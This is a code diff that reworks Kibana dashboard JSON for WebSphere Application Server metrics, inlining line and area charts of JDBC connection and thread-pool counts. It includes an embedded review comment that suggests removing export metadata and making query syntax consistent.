- { - "id": "metrics-*", - "name": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99:indexpattern-datasource-layer-5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", - "type": "index-pattern" + "panelIndex": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "c135b7c4-fd05-4a15-84d3-a959e24b077b": { + "columnOrder": [ + "a9009677-9999-4611-8f21-9a19fe50cda2", + "00acd61f-00ee-4c2b-a46d-6e6ee9b09ecd", + "91f4b685-d7b8-469f-b496-143f0f130cfe" + ], + "columns": { + "00acd61f-00ee-4c2b-a46d-6e6ee9b09ecd": 
{ + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.threadpool.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "91f4b685-d7b8-469f-b496-143f0f130cfe", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.threadpool.name" + }, + "91f4b685-d7b8-469f-b496-143f0f130cfe": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.cleared: *" + }, + "isBucketed": false, + "label": "Cleared Threads", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.threadpool.threads.cleared" + }, + "a9009677-9999-4611-8f21-9a19fe50cda2": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.threadpool.threads.cleared : * " + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "91f4b685-d7b8-469f-b496-143f0f130cfe" + ], + "layerId": "c135b7c4-fd05-4a15-84d3-a959e24b077b", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "00acd61f-00ee-4c2b-a46d-6e6ee9b09ecd", + "xAccessor": 
"a9009677-9999-4611-8f21-9a19fe50cda2" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "Number of Cleared Threads [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-c135b7c4-fd05-4a15-84d3-a959e24b077b", + "type": "index-pattern" + } + ] + } }, - { - "id": "websphere_application_server-426d3360-bae6-11ec-b244-51e5cddeab04", - "name": "52f44709-7bc3-4886-8a11-75e785a3816f:panel_52f44709-7bc3-4886-8a11-75e785a3816f", - "type": "lens" + "gridData": { + "h": 12, + "i": "52f44709-7bc3-4886-8a11-75e785a3816f", + "w": 25, + "x": 23, + "y": 27 }, - { - "id": "metrics-*", - "name": "controlGroup_1823c9ec-6346-4b88-9295-a75f2f74730d:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "52f44709-7bc3-4886-8a11-75e785a3816f", + "type": "lens", + "version": "8.3.0" + } ], - "type": "dashboard" + "refreshInterval": { + "pause": true, + "value": 0 + }, + "timeFrom": "now-15m", + "timeRestore": true, + "timeTo": "now", + "title": "[Metrics WebSphere Application Server] ThreadPool", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99:indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99:indexpattern-datasource-layer-5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "controlGroup_1823c9ec-6346-4b88-9295-a75f2f74730d:optionsListDataView", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": 
"b007e627-23d4-4328-b064-3877c40ca3c3:indexpattern-datasource-layer-5b4f04cc-fca5-4e2e-b12e-a08d6a89d693", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "d7e182d4-6f2b-4e48-9985-4bfd9d792d0c:indexpattern-datasource-layer-407fa94b-9ce9-4ac2-9ca6-1c43dea9bbd0", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "f087d207-2453-4b0e-a31f-43ee8d5528c4:indexpattern-datasource-layer-8d78bbff-634f-4aff-9c25-d3f211b564eb", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "9a2671f2-1ebb-4cdf-ad80-6aae92c17bb0:indexpattern-datasource-layer-1decd051-dbf6-4a80-aa20-85278fedc2d4", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "30eb3e90-77bb-49f4-bb1f-0f06835a2d99:indexpattern-datasource-layer-5c2223d3-b3ba-45a2-848f-2a5e4ab9264c", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "52f44709-7bc3-4886-8a11-75e785a3816f:indexpattern-datasource-layer-c135b7c4-fd05-4a15-84d3-a959e24b077b", + "id": "metrics-*" + } + ], + "migrationVersion": { + "dashboard": "8.3.0" + }, + "coreMigrationVersion": "8.3.0" } \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-5d9b0860-b582-11ec-89b4-c91c947c1fb3.json b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-5d9b0860-b582-11ec-89b4-c91c947c1fb3.json index e932b8fc15a..95d2271a6f5 100644 --- a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-5d9b0860-b582-11ec-89b4-c91c947c1fb3.json +++ b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-5d9b0860-b582-11ec-89b4-c91c947c1fb3.json 
@@ -1,136 +1,724 @@ { - "attributes": { - "controlGroupInput": { - "chainingSystem": "HIERARCHICAL", - "controlStyle": "oneLine", - "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", - "panelsJSON": "{\"9fb4cabe-4f7e-49e8-8afe-43acde518929\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"websphere_application_server.jdbc.data_source\",\"title\":\"Data Source\",\"id\":\"9fb4cabe-4f7e-49e8-8afe-43acde518929\",\"enhancements\":{}}}}" - }, - "description": "JDBC dashboard for WebSphere Application Server Metrics.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "websphere_application_server-5d9b0860-b582-11ec-89b4-c91c947c1fb3", + "type": "dashboard", + "namespaces": [ + "default" + ], + "updated_at": "2023-11-07T17:50:18.506Z", + "version": "WzQyMiwxXQ==", + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"9fb4cabe-4f7e-49e8-8afe-43acde518929\":{\"order\":0,\"width\":\"medium\",\"grow\":true,\"type\":\"optionsListControl\",\"explicitInput\":{\"fieldName\":\"websphere_application_server.jdbc.data_source\",\"title\":\"Data Source\",\"id\":\"9fb4cabe-4f7e-49e8-8afe-43acde518929\",\"enhancements\":{}}}}" + }, + "description": "JDBC dashboard for WebSphere Application Server Metrics.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + 
"datasourceStates": { + "indexpattern": { + "layers": { + "5cb0751e-cee8-41d7-a221-1c89264c3c7e": { + "columnOrder": [ + "acf862f8-f0e1-482c-a70d-1599b559ba14", + "005f5de3-8a9a-4e48-8f85-293f2a8b283a", + "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9" + ], + "columns": { + "005f5de3-8a9a-4e48-8f85-293f2a8b283a": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.jdbc.data_source", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.jdbc.data_source" + }, + "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.total.operations_calls: *" + }, + "isBucketed": false, + "label": "Total operations calls", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.total.operations_calls" + }, + "acf862f8-f0e1-482c-a70d-1599b559ba14": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } } - } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.total.operations_calls > 0" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 
0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "9915f27a-f0d1-4aa3-ac79-eff63ea4b7a9" + ], + "layerId": "5cb0751e-cee8-41d7-a221-1c89264c3c7e", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "005f5de3-8a9a-4e48-8f85-293f2a8b283a", + "xAccessor": "acf862f8-f0e1-482c-a70d-1599b559ba14" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "Number of Operation Calls [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5cb0751e-cee8-41d7-a221-1c89264c3c7e", + "type": "index-pattern" + } + ] + } }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "gridData": { + "h": 12, + "i": "afecf39d-0a9d-4d47-9ad4-c85a8e0efc99", + "w": 22, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 12, - "i": "afecf39d-0a9d-4d47-9ad4-c85a8e0efc99", - "w": 22, - "x": 0, - "y": 0 - }, - "panelIndex": "afecf39d-0a9d-4d47-9ad4-c85a8e0efc99", - "panelRefName": "panel_afecf39d-0a9d-4d47-9ad4-c85a8e0efc99", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 17, - "i": "51bf1823-c26b-44d8-8776-b6b3635b5d75", - "w": 26, - "x": 22, - "y": 0 - }, - "panelIndex": "51bf1823-c26b-44d8-8776-b6b3635b5d75", - "panelRefName": "panel_51bf1823-c26b-44d8-8776-b6b3635b5d75", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 17, - "i": "133482d2-129b-42c8-b785-576e02815b22", - 
"w": 22, - "x": 0, - "y": 12 - }, - "panelIndex": "133482d2-129b-42c8-b785-576e02815b22", - "panelRefName": "panel_133482d2-129b-42c8-b785-576e02815b22", - "title": "Number of Free Connections [Metrics WebSphere Application Server]", - "type": "lens", - "version": "8.3.0" + "panelIndex": "afecf39d-0a9d-4d47-9ad4-c85a8e0efc99", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "6a787cb2-6500-4f46-bcc0-56ba379b2ec1": { + "columnOrder": [ + "6e346b5c-b6b3-4e66-ad29-3621b6165b6c", + "9c631c61-9a76-4650-90fe-b481257c028e", + "25cdb2ff-2d42-4703-9419-2375ef16c439", + "00acb34f-ae34-439a-9cb7-45a09bb69e15", + "03351030-51ad-4c19-9e9e-9a550b2e23e4", + "e7bed513-0fe1-460d-affc-4186777ff41a" + ], + "columns": { + "00acb34f-ae34-439a-9cb7-45a09bb69e15": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.closed: *" + }, + "isBucketed": false, + "label": "Closed Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.closed" + }, + "03351030-51ad-4c19-9e9e-9a550b2e23e4": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.allocated: *" + }, + "isBucketed": false, + "label": "Allocated Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.allocated" + }, + "25cdb2ff-2d42-4703-9419-2375ef16c439": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.created: *" + }, + "isBucketed": false, + "label": "Created Connections", + "operationType": 
"last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.created" + }, + "6e346b5c-b6b3-4e66-ad29-3621b6165b6c": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "9c631c61-9a76-4650-90fe-b481257c028e": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.jdbc.data_source", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "03351030-51ad-4c19-9e9e-9a550b2e23e4", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.jdbc.data_source" + }, + "e7bed513-0fe1-460d-affc-4186777ff41a": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.returned: *" + }, + "isBucketed": false, + "label": "Returned Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.returned" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.created > 0 or websphere_application_server.jdbc.connection.closed > 0 or websphere_application_server.jdbc.connection.allocated > 0 or websphere_application_server.jdbc.connection.returned > 0" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + 
"labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "25cdb2ff-2d42-4703-9419-2375ef16c439", + "00acb34f-ae34-439a-9cb7-45a09bb69e15", + "03351030-51ad-4c19-9e9e-9a550b2e23e4", + "e7bed513-0fe1-460d-affc-4186777ff41a" + ], + "layerId": "6a787cb2-6500-4f46-bcc0-56ba379b2ec1", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "9c631c61-9a76-4650-90fe-b481257c028e", + "xAccessor": "6e346b5c-b6b3-4e66-ad29-3621b6165b6c" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + }, + "yTitle": "Count" + } }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 12, - "i": "bd9b0066-03c7-4477-a479-f47350a28d14", - "w": 26, - "x": 22, - "y": 17 - }, - "panelIndex": "bd9b0066-03c7-4477-a479-f47350a28d14", - "panelRefName": "panel_bd9b0066-03c7-4477-a479-f47350a28d14", - "type": "lens", - "version": "8.3.0" - } - ], - "refreshInterval": { - "pause": true, - "value": 0 + "title": "Number of Created, Closed, Allocated and Returned Connections [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6a787cb2-6500-4f46-bcc0-56ba379b2ec1", + "type": "index-pattern" + } + ] + } }, - "timeFrom": "now-15m", - "timeRestore": true, - "timeTo": "now", - "title": "[Metrics WebSphere Application Server] JDBC", - "version": 1 - }, - "coreMigrationVersion": "8.3.0", - "id": "websphere_application_server-5d9b0860-b582-11ec-89b4-c91c947c1fb3", - "migrationVersion": { - "dashboard": "8.3.0" - }, - "references": [ - { - "id": "websphere_application_server-37972440-b49d-11ec-9a7c-ef3101c300f1", - "name": 
"afecf39d-0a9d-4d47-9ad4-c85a8e0efc99:panel_afecf39d-0a9d-4d47-9ad4-c85a8e0efc99", - "type": "lens" + "gridData": { + "h": 17, + "i": "51bf1823-c26b-44d8-8776-b6b3635b5d75", + "w": 26, + "x": 22, + "y": 0 }, - { - "id": "websphere_application_server-3b877140-b49d-11ec-9a7c-ef3101c300f1", - "name": "51bf1823-c26b-44d8-8776-b6b3635b5d75:panel_51bf1823-c26b-44d8-8776-b6b3635b5d75", - "type": "lens" + "panelIndex": "51bf1823-c26b-44d8-8776-b6b3635b5d75", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "093d1982-684a-40db-bed9-9426559b90ee": { + "columnOrder": [ + "5df21f55-a6e2-439c-a15d-3d1d63f30b67", + "aaf7723c-6ca8-4015-864d-8263d7488d72", + "a2c8801f-9e82-4502-a4db-8290bf4b4b7e" + ], + "columns": { + "5df21f55-a6e2-439c-a15d-3d1d63f30b67": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "a2c8801f-9e82-4502-a4db-8290bf4b4b7e": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.free: *" + }, + "isBucketed": false, + "label": "Free Connections", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.free" + }, + "aaf7723c-6ca8-4015-864d-8263d7488d72": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.jdbc.data_source", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "a2c8801f-9e82-4502-a4db-8290bf4b4b7e", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + 
"size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.jdbc.data_source" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "a2c8801f-9e82-4502-a4db-8290bf4b4b7e" + ], + "layerId": "093d1982-684a-40db-bed9-9426559b90ee", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "aaf7723c-6ca8-4015-864d-8263d7488d72", + "xAccessor": "5df21f55-a6e2-439c-a15d-3d1d63f30b67" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "Number of Free Connections [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-093d1982-684a-40db-bed9-9426559b90ee", + "type": "index-pattern" + } + ] + } }, - { - "id": "websphere_application_server-3fe9e100-b49d-11ec-9a7c-ef3101c300f1", - "name": "133482d2-129b-42c8-b785-576e02815b22:panel_133482d2-129b-42c8-b785-576e02815b22", - "type": "lens" + "gridData": { + "h": 17, + "i": "133482d2-129b-42c8-b785-576e02815b22", + "w": 22, + "x": 0, + "y": 12 }, - { - "id": "websphere_application_server-443e1ff0-b49d-11ec-9a7c-ef3101c300f1", - "name": "bd9b0066-03c7-4477-a479-f47350a28d14:panel_bd9b0066-03c7-4477-a479-f47350a28d14", - "type": "lens" + "panelIndex": 
"133482d2-129b-42c8-b785-576e02815b22", + "title": "Number of Free Connections [Metrics WebSphere Application Server]", + "type": "lens", + "version": "8.3.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "f73c674c-32f9-437c-9556-c02eef1a0871": { + "columnOrder": [ + "c4abbc8f-c0f8-43de-aae9-ceeff9026807", + "880644a5-cf8e-4cd1-a607-0982600b03fa", + "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea" + ], + "columns": { + "880644a5-cf8e-4cd1-a607-0982600b03fa": { + "dataType": "string", + "isBucketed": true, + "label": "Top values of websphere_application_server.jdbc.data_source", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 3 + }, + "scale": "ordinal", + "sourceField": "websphere_application_server.jdbc.data_source" + }, + "c4abbc8f-c0f8-43de-aae9-ceeff9026807": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.total.in_use: *" + }, + "isBucketed": false, + "label": "Total Connections In Use", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.jdbc.connection.total.in_use" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "websphere_application_server.jdbc.connection.total.in_use >0" + }, + "visualization": { + "axisTitlesVisibilitySettings": 
{ + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "fe52b8cf-86bc-4b20-a7c0-d3398ccdc4ea" + ], + "layerId": "f73c674c-32f9-437c-9556-c02eef1a0871", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "splitAccessor": "880644a5-cf8e-4cd1-a607-0982600b03fa", + "xAccessor": "c4abbc8f-c0f8-43de-aae9-ceeff9026807" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right" + }, + "preferredSeriesType": "line", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "yLeftExtent": { + "mode": "full" + }, + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "Total Connections In Use [Metrics WebSphere Application Server]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f73c674c-32f9-437c-9556-c02eef1a0871", + "type": "index-pattern" + } + ] + } }, - { - "id": "metrics-*", - "name": "controlGroup_9fb4cabe-4f7e-49e8-8afe-43acde518929:optionsListDataView", - "type": "index-pattern" - } + "gridData": { + "h": 12, + "i": "bd9b0066-03c7-4477-a479-f47350a28d14", + "w": 26, + "x": 22, + "y": 17 + }, + "panelIndex": "bd9b0066-03c7-4477-a479-f47350a28d14", + "type": "lens", + "version": "8.3.0" + } ], - "type": "dashboard" + "refreshInterval": { + "pause": true, + "value": 0 + }, + "timeFrom": "now-15m", + "timeRestore": true, + "timeTo": "now", + "title": "[Metrics WebSphere Application Server] JDBC", + "version": 1 + }, + "references": [ + { + "id": "metrics-*", + "name": "controlGroup_9fb4cabe-4f7e-49e8-8afe-43acde518929:optionsListDataView", + "type": "index-pattern" + }, + { + "type": "index-pattern", + "name": 
"afecf39d-0a9d-4d47-9ad4-c85a8e0efc99:indexpattern-datasource-layer-5cb0751e-cee8-41d7-a221-1c89264c3c7e", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "51bf1823-c26b-44d8-8776-b6b3635b5d75:indexpattern-datasource-layer-6a787cb2-6500-4f46-bcc0-56ba379b2ec1", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "133482d2-129b-42c8-b785-576e02815b22:indexpattern-datasource-layer-093d1982-684a-40db-bed9-9426559b90ee", + "id": "metrics-*" + }, + { + "type": "index-pattern", + "name": "bd9b0066-03c7-4477-a479-f47350a28d14:indexpattern-datasource-layer-f73c674c-32f9-437c-9556-c02eef1a0871", + "id": "metrics-*" + } + ], + "migrationVersion": { + "dashboard": "8.3.0" + }, + "coreMigrationVersion": "8.3.0" } \ No newline at end of file diff --git a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-b8da46b0-b595-11ec-888d-b1230de080fd.json b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-b8da46b0-b595-11ec-888d-b1230de080fd.json index adea1efff97..31ff3e95a82 100644 --- a/packages/websphere_application_server/kibana/dashboard/websphere_application_server-b8da46b0-b595-11ec-888d-b1230de080fd.json +++ b/packages/websphere_application_server/kibana/dashboard/websphere_application_server-b8da46b0-b595-11ec-888d-b1230de080fd.json 
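Review bot: The new top-level `"updated_at": "2023-11-07T17:50:18.506Z"`, `"version": "WzQyMiwxXQ=="` and `"namespaces": ["default"]` look like raw saved-object export metadata from the exporting Kibana instance rather than part of the dashboard definition; the previous version of this file did not carry them, and they will churn on every re-export and differ between whoever exports, so I would drop those three keys (the same fields appear in the Servlet dashboard hunk that follows). Within the same hunk the "Total Connections In Use" panel filters with `"query": "websphere_application_server.jdbc.connection.total.in_use >0"` while its siblings use the `> 0` form, and the "Number of Free Connections" panel ships an empty `"query": ""` where the other three panels restrict to their own metric; normalizing to `> 0` on both keeps the four panels consistent. That same Free Connections panel also keeps a panel-level `"title"` and `"hidePanelTitles": false` that duplicate `attributes.title` now that the visualization is inlined by value, which reads as a leftover from the by-reference version and can be removed.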
@@ -1,96 +1,485 @@ { - "attributes": { - "description": "Servlet dashboard for WebSphere Application Server Metrics.", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" + "id": "websphere_application_server-b8da46b0-b595-11ec-888d-b1230de080fd", + "type": "dashboard", + "namespaces": [ + "default" + ], + "updated_at": "2023-11-07T17:50:18.506Z", + "version": "WzQyMywxXQ==", + "attributes": { + "description": "Servlet dashboard for WebSphere Application Server Metrics.", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "indexpattern": { + "layers": { + "39707dfa-c5ec-473f-8d7f-43c96a9beaef": { + "columnOrder": [ + "17f33a89-5e4f-4b62-a12e-ea9870e908ac" + ], + "columns": { + "17f33a89-5e4f-4b62-a12e-ea9870e908ac": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Errors", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "websphere_application_server.servlet.errors" + } + }, + "incompleteColumns": {} + } + } } - } + }, + "filters": [], + "query": { + "language": "kuery", + "query": 